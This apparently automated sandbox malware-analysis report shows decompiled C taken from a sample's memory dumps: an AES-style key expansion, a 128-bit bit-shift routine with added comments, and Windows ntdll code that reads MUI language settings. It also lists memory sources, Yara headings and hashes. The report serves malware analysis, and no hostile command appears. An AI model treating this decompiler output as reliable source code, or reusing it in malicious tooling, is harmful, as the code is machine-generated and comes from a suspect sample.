                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7ce4428a283cb0e64d26c80b9cb4ddd0a6c123eb570fb44d31a2cc5592ba134e
                                                                                                                                                    • Instruction ID: 0df29e370d3a3c406148d5cc3e1fd67dc69c29ccbd6f9b3f0dba37af0b45d239
                                                                                                                                                    • Opcode Fuzzy Hash: 7ce4428a283cb0e64d26c80b9cb4ddd0a6c123eb570fb44d31a2cc5592ba134e
                                                                                                                                                    • Instruction Fuzzy Hash: 1B91D3B290432ACBCB24CF06C4905B93BA2FF54752B25806EFD855B391E774C996E7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                                                                                                                                    				signed int _t66;
                                                                                                                                                    				signed int* _t69;
                                                                                                                                                    				signed int* _t81;
                                                                                                                                                    				signed int _t94;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				signed int _t106;
                                                                                                                                                    				signed int _t108;
                                                                                                                                                    				signed int* _t110;
                                                                                                                                                    				signed int _t127;
                                                                                                                                                    				signed int _t129;
                                                                                                                                                    				signed int _t133;
                                                                                                                                                    				signed int _t152;
                                                                                                                                                    				intOrPtr _t171;
                                                                                                                                                    
                                                                                                                                                    				_t81 = _a12;
                                                                                                                                                    				_t110 = _a8;
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol eax, 0x8");
                                                                                                                                                    				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                                                                                                                                    				_t66 =  &(_t110[1]);
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol ecx, 0x8");
                                                                                                                                                    				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                                                                                                                                    				if(_a16 != 0x100) {
                                                                                                                                                    					L4:
                                                                                                                                                    					return _t66 | 0xffffffff;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t171 = _a4;
                                                                                                                                                    					_t69 = 0;
                                                                                                                                                    					_a12 = 0;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_t152 =  *(_t66 + 0x18);
                                                                                                                                                    						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                                                                                                                                    						_t127 =  *_t66 ^ _t94;
                                                                                                                                                    						 *(_t66 + 0x1c) = _t94;
                                                                                                                                                    						_t96 =  *(_t66 + 4) ^ _t127;
                                                                                                                                                    						 *(_t66 + 0x20) = _t127;
                                                                                                                                                    						_t129 =  *(_t66 + 8) ^ _t96;
                                                                                                                                                    						 *(_t66 + 0x24) = _t96;
                                                                                                                                                    						 *(_t66 + 0x28) = _t129;
                                                                                                                                                    						if(_t69 == 6) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                                                                                                                                    						_t133 =  *(_t66 + 0x10) ^ _t106;
                                                                                                                                                    						 *(_t66 + 0x2c) = _t106;
                                                                                                                                                    						_t108 =  *(_t66 + 0x14) ^ _t133;
                                                                                                                                                    						 *(_t66 + 0x34) = _t108;
                                                                                                                                                    						_t69 =  &(_a12[0]);
                                                                                                                                                    						 *(_t66 + 0x30) = _t133;
                                                                                                                                                    						 *(_t66 + 0x38) = _t108 ^ _t152;
                                                                                                                                                    						_t66 = _t66 + 0x20;
                                                                                                                                                    						_a12 = _t69;
                                                                                                                                                    						if(_t69 < 7) {
                                                                                                                                                    							continue;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L4;
                                                                                                                                                    						}
                                                                                                                                                    						goto L6;
                                                                                                                                                    					}
                                                                                                                                                    					return 0xe;
                                                                                                                                                    				}
                                                                                                                                                    				L6:
                                                                                                                                                    			}
















                                                                                                                                                    0x00402efb
                                                                                                                                                    0x00402efd
                                                                                                                                                    0x00402f03
                                                                                                                                                    0x00402f05
                                                                                                                                                    0x00402f0b
                                                                                                                                                    0x00402f0d
                                                                                                                                                    0x00402f10
                                                                                                                                                    0x00402f16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f72
                                                                                                                                                    0x00402f78
                                                                                                                                                    0x00402f7a
                                                                                                                                                    0x00402f80
                                                                                                                                                    0x00402f82
                                                                                                                                                    0x00402f87
                                                                                                                                                    0x00402f88
                                                                                                                                                    0x00402f8b
                                                                                                                                                    0x00402f8e
                                                                                                                                                    0x00402f91
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
/*
 * Decompiler output. Treats the 16 bytes at __eax as one big-endian
 * 128-bit value and shifts it right by one bit in place: each 32-bit
 * word is shifted right by one, and the low bit of the preceding word
 * is carried into its top bit (0x80000000).
 */
signed char* E00401030(signed char* __eax) {
	signed char* _t37;
	unsigned int _t65;
	unsigned int _t73;
	unsigned int _t81;
	unsigned int _t88;
	signed char _t94;
	signed char _t97;
	signed char _t100;

	_t37 = __eax;
	/* Word 3 (bytes 0xc..0xf), carry in from byte 0xb. */
	_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
	_t94 = __eax[0xb];
	if((_t94 & 0x00000001) != 0) {
		_t65 = _t65 | 0x80000000;
	}
	_t37[0xc] = _t65 >> 0x18;
	_t37[0xf] = _t65;
	_t37[0xd] = _t65 >> 0x10;
	/* Word 2 (bytes 8..0xb), carry in from byte 7. */
	_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
	_t97 = _t37[7];
	_t37[0xe] = _t65 >> 8;
	if((_t97 & 0x00000001) != 0) {
		_t73 = _t73 | 0x80000000;
	}
	_t37[8] = _t73 >> 0x18;
	_t37[0xb] = _t73;
	_t37[9] = _t73 >> 0x10;
	/* Word 1 (bytes 4..7), carry in from byte 3. */
	_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
	_t100 = _t37[3];
	_t37[0xa] = _t73 >> 8;
	if((_t100 & 0x00000001) != 0) {
		_t81 = _t81 | 0x80000000;
	}
	_t37[4] = _t81 >> 0x18;
	_t37[7] = _t81;
	_t37[5] = _t81 >> 0x10;
	/* Word 0 (bytes 0..3), no carry in: the top bit becomes 0. */
	_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
	 *_t37 = _t88 >> 0x18;
	_t37[1] = _t88 >> 0x10;
	_t37[6] = _t81 >> 8;
	_t37[2] = _t88 >> 8;
	_t37[3] = _t88;
	return _t37;
}












                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00948788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				short* _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _v32;
                                                                                                                                                    				char _v36;
                                                                                                                                                    				signed int _v40;
                                                                                                                                                    				char _v44;
                                                                                                                                                    				signed int _v48;
                                                                                                                                                    				signed int _v52;
                                                                                                                                                    				signed int _v56;
                                                                                                                                                    				signed int _v60;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				void* _t216;
                                                                                                                                                    				intOrPtr _t231;
                                                                                                                                                    				short* _t235;
                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                    				short* _t261;
                                                                                                                                                    				intOrPtr _t284;
                                                                                                                                                    				intOrPtr _t288;
                                                                                                                                                    				void* _t314;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				short* _t319;
                                                                                                                                                    				intOrPtr _t321;
                                                                                                                                                    				void* _t328;
                                                                                                                                                    				void* _t329;
                                                                                                                                                    				char* _t332;
                                                                                                                                                    				signed int _t333;
                                                                                                                                                    				signed int* _t334;
                                                                                                                                                    				void* _t335;
                                                                                                                                                    				void* _t338;
                                                                                                                                                    				void* _t339;
                                                                                                                                                    
                                                                                                                                                    				_t328 = __edx;
                                                                                                                                                    				_t322 = __ecx;
                                                                                                                                                    				_t318 = 0;
                                                                                                                                                    				_t334 = _a4;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_v48 = 0;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v40 = 0;
                                                                                                                                                    				_v32 = 0;
                                                                                                                                                    				_v52 = 0;
                                                                                                                                                    				if(_t334 == 0) {
                                                                                                                                                    					_t329 = 0xc000000d;
                                                                                                                                                    					L49:
                                                                                                                                                    					_t334[0x11] = _v56;
                                                                                                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                    					_t334[0x12] = _v60;
                                                                                                                                                    					_t334[0x13] = _v28;
                                                                                                                                                    					_t334[0x17] = _v20;
                                                                                                                                                    					_t334[0x16] = _v48;
                                                                                                                                                    					_t334[0x18] = _v40;
                                                                                                                                                    					_t334[0x14] = _v32;
                                                                                                                                                    					_t334[0x15] = _v52;
                                                                                                                                                    					return _t329;
                                                                                                                                                    				}
                                                                                                                                                    				_v56 = 0;
                                                                                                                                                    				if(E00948460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_v56 = 1;
                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                    						_t207 = E0092E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_push(1);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E0094718A(_t207);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_v60 = _v60 | 0xffffffff;
                                                                                                                                                    				if(E00948460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_t333 =  *_v8;
                                                                                                                                                    					_v60 = _t333;
                                                                                                                                                    					_t314 = E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					_push(_t333);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E0094718A(_t314);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_t216 = E00948460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                    				_t332 = ";";
                                                                                                                                                    				if(_t216 < 0) {
                                                                                                                                                    					L17:
                                                                                                                                                    					if(E00948460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    						L30:
                                                                                                                                                    						if(E00948460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    							L46:
                                                                                                                                                    							_t329 = 0;
                                                                                                                                                    							L47:
                                                                                                                                                    							if(_v8 != _t318) {
                                                                                                                                                    								E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							if(_v28 != _t318) {
                                                                                                                                                    								if(_v20 != _t318) {
                                                                                                                                                    									E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    									_v20 = _t318;
                                                                                                                                                    									_v40 = _t318;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							goto L49;
                                                                                                                                                    						}
                                                                                                                                                    						_t231 = _v24;
                                                                                                                                                    						_t322 = _t231 + 4;
                                                                                                                                                    						_push(_t231);
                                                                                                                                                    						_v52 = _t322;
                                                                                                                                                    						E0094718A(_t231);
                                                                                                                                                    						if(_t322 == _t318) {
                                                                                                                                                    							_v32 = _t318;
                                                                                                                                                    						} else {
                                                                                                                                                    							_v32 = E0092E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v32 == _t318) {
                                                                                                                                                    							_v52 = _t318;
                                                                                                                                                    							L58:
                                                                                                                                                    							_t329 = 0xc0000017;
                                                                                                                                                    							goto L47;
                                                                                                                                                    						} else {
                                                                                                                                                    							E00922340(_v32, _v8, _v24);
                                                                                                                                                    							_v16 = _v32;
                                                                                                                                                    							_a4 = _t318;
                                                                                                                                                    							_t235 = E0093E679(_v32, _t332);
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t319 = _t235;
                                                                                                                                                    								if(_t319 == 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								 *_t319 = 0;
                                                                                                                                                    								_t321 = _t319 + 2;
                                                                                                                                                    								E0092E2A8(_t322,  &_v68, _v16);
                                                                                                                                                    								if(E00945553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    								_v16 = _t321;
                                                                                                                                                    								_t235 = E0093E679(_t321, _t332);
                                                                                                                                                    								_pop(_t322);
                                                                                                                                                    							}
                                                                                                                                                    							_t236 = _v16;
                                                                                                                                                    							if( *_v16 != _t319) {
                                                                                                                                                    								E0092E2A8(_t322,  &_v68, _t236);
                                                                                                                                                    								if(E00945553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							if(_a4 == 0) {
                                                                                                                                                    								E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                    								_v52 = _v52 & 0x00000000;
                                                                                                                                                    								_v32 = _v32 & 0x00000000;
                                                                                                                                                    							}
                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                    								E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                                    							_t318 = 0;
                                                                                                                                                    							goto L46;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t257 = _v24;
                                                                                                                                                    					_t322 = _t257 + 4;
                                                                                                                                                    					_push(_t257);
                                                                                                                                                    					_v40 = _t322;
                                                                                                                                                    					E0094718A(_t257);
                                                                                                                                                    					_t338 = _t335 + 4;
                                                                                                                                                    					if(_t322 == _t318) {
                                                                                                                                                    						_v20 = _t318;
                                                                                                                                                    					} else {
                                                                                                                                                    						_v20 = E0092E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v20 == _t318) {
                                                                                                                                                    						_v40 = _t318;
                                                                                                                                                    						goto L58;
                                                                                                                                                    					} else {
                                                                                                                                                    						E00922340(_v20, _v8, _v24);
                                                                                                                                                    						_v16 = _v20;
                                                                                                                                                    						_a4 = _t318;
                                                                                                                                                    						_t261 = E0093E679(_v20, _t332);
                                                                                                                                                    						_t335 = _t338 + 0x14;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_v12 = _t261;
                                                                                                                                                    							if(_t261 == _t318) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_v12 = _v12 + 2;
                                                                                                                                                    							 *_v12 = 0;
                                                                                                                                                    							E0092E2A8(_v12,  &_v68, _v16);
                                                                                                                                                    							if(E00945553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v12;
                                                                                                                                                    							_t261 = E0093E679(_v12, _t332);
                                                                                                                                                    							_pop(_t322);
                                                                                                                                                    						}
                                                                                                                                                    						_t269 = _v16;
                                                                                                                                                    						if( *_v16 != _t318) {
                                                                                                                                                    							E0092E2A8(_t322,  &_v68, _t269);
                                                                                                                                                    							if(E00945553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						if(_a4 == _t318) {
                                                                                                                                                    							E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    							_v40 = _t318;
                                                                                                                                                    							_v20 = _t318;
                                                                                                                                                    						}
                                                                                                                                                    						if(_v8 != _t318) {
                                                                                                                                                    							E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    						}
                                                                                                                                                    						_v8 = _t318;
                                                                                                                                                    						goto L30;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t284 = _v24;
                                                                                                                                                    				_t322 = _t284 + 4;
                                                                                                                                                    				_push(_t284);
                                                                                                                                                    				_v48 = _t322;
                                                                                                                                                    				E0094718A(_t284);
                                                                                                                                                    				_t339 = _t335 + 4;
                                                                                                                                                    				if(_t322 == _t318) {
                                                                                                                                                    					_v28 = _t318;
                                                                                                                                                    				} else {
                                                                                                                                                    					_v28 = E0092E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v28 == _t318) {
                                                                                                                                                    					_v48 = _t318;
                                                                                                                                                    					goto L58;
                                                                                                                                                    				} else {
                                                                                                                                                    					E00922340(_v28, _v8, _v24);
                                                                                                                                                    					_v16 = _v28;
                                                                                                                                                    					_a4 = _t318;
                                                                                                                                                    					_t288 = E0093E679(_v28, _t332);
                                                                                                                                                    					_t335 = _t339 + 0x14;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_v12 = _t288;
                                                                                                                                                    						if(_t288 == _t318) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_v12 = _v12 + 2;
                                                                                                                                                    						 *_v12 = 0;
                                                                                                                                                    						E0092E2A8(_v12,  &_v68, _v16);
                                                                                                                                                    						if(E00945553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						_v16 = _v12;
                                                                                                                                                    						_t288 = E0093E679(_v12, _t332);
                                                                                                                                                    						_pop(_t322);
                                                                                                                                                    					}
                                                                                                                                                    					_t296 = _v16;
                                                                                                                                                    					if( *_v16 != _t318) {
                                                                                                                                                    						E0092E2A8(_t322,  &_v68, _t296);
                                                                                                                                                    						if(E00945553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					if(_a4 == _t318) {
                                                                                                                                                    						E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                    						_v48 = _t318;
                                                                                                                                                    						_v28 = _t318;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v8 != _t318) {
                                                                                                                                                    						E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					goto L17;
                                                                                                                                                    				}
                                                                                                                                                    			}





































                                                                                                                                                    0x00948986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00991b6e
                                                                                                                                                    0x00991b74
                                                                                                                                                    0x00991b7b
                                                                                                                                                    0x00991b8f
                                                                                                                                                    0x00991b91
                                                                                                                                                    0x00991b91
                                                                                                                                                    0x00991b99
                                                                                                                                                    0x00991b9c
                                                                                                                                                    0x00991ba2
                                                                                                                                                    0x00991ba2
                                                                                                                                                    0x0094898c
                                                                                                                                                    0x00948992
                                                                                                                                                    0x00948999
                                                                                                                                                    0x009489ad
                                                                                                                                                    0x00991ba8
                                                                                                                                                    0x00991ba8
                                                                                                                                                    0x009489ad
                                                                                                                                                    0x009489b6
                                                                                                                                                    0x009489c8
                                                                                                                                                    0x009489cd
                                                                                                                                                    0x009489d0
                                                                                                                                                    0x009489d0
                                                                                                                                                    0x009489d6
                                                                                                                                                    0x009489e8
                                                                                                                                                    0x009489e8
                                                                                                                                                    0x009489ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009489ed
                                                                                                                                                    0x0094895a
                                                                                                                                                    0x0094883e
                                                                                                                                                    0x00948841
                                                                                                                                                    0x00948844
                                                                                                                                                    0x00948845
                                                                                                                                                    0x00948848
                                                                                                                                                    0x0094884d
                                                                                                                                                    0x00948852
                                                                                                                                                    0x00948b49
                                                                                                                                                    0x00948858
                                                                                                                                                    0x0094886c
                                                                                                                                                    0x0094886c
                                                                                                                                                    0x00948872
                                                                                                                                                    0x00991b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948878
                                                                                                                                                    0x00948881
                                                                                                                                                    0x0094888b
                                                                                                                                                    0x0094888e
                                                                                                                                                    0x00948891
                                                                                                                                                    0x00948896
                                                                                                                                                    0x00948899
                                                                                                                                                    0x00948899
                                                                                                                                                    0x0094889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00991b21
                                                                                                                                                    0x00991b27
                                                                                                                                                    0x00991b2e
                                                                                                                                                    0x00991b42
                                                                                                                                                    0x00991b44
                                                                                                                                                    0x00991b44
                                                                                                                                                    0x00991b4c
                                                                                                                                                    0x00991b4f
                                                                                                                                                    0x00991b55
                                                                                                                                                    0x00991b55
                                                                                                                                                    0x009488a4
                                                                                                                                                    0x009488aa
                                                                                                                                                    0x009488b1
                                                                                                                                                    0x009488c5
                                                                                                                                                    0x00991b5b
                                                                                                                                                    0x00991b5b
                                                                                                                                                    0x009488c5
                                                                                                                                                    0x009488ce
                                                                                                                                                    0x009488e0
                                                                                                                                                    0x009488e5
                                                                                                                                                    0x009488e8
                                                                                                                                                    0x009488e8
                                                                                                                                                    0x009488ee
                                                                                                                                                    0x00948900
                                                                                                                                                    0x00948900
                                                                                                                                                    0x00948905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00948827
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 009487E6
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00948914
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 009489FC
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 009487C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
